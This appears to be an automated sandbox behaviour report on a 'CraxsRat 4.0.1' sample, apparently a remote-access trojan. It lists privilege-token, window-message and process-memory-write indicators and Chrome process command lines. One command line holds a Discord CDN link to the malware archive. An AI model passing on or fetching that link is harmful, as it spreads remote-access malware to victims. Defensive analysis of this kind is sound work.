N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\WinRAR\WinRAR.exe N/A
N/A N/A C:\Program Files\WinRAR\WinRAR.exe N/A
N/A N/A C:\Program Files\WinRAR\WinRAR.exe N/A
N/A N/A C:\Program Files\WinRAR\WinRAR.exe N/A
N/A N/A C:\Program Files\WinRAR\WinRAR.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3592 wrote to memory of 2712 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2712 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 2628 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 1436 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 1436 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3592 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://cdn.discordapp.com/attachments/1096943623599312947/1120870643668373535/CraxsRat_4.0.1.zip

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd62bd9758,0x7ffd62bd9768,0x7ffd62bd9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1816 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2220 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3192 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3172 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5096 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5132 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5296 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5524 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5680 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5820 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5964 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=6112 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

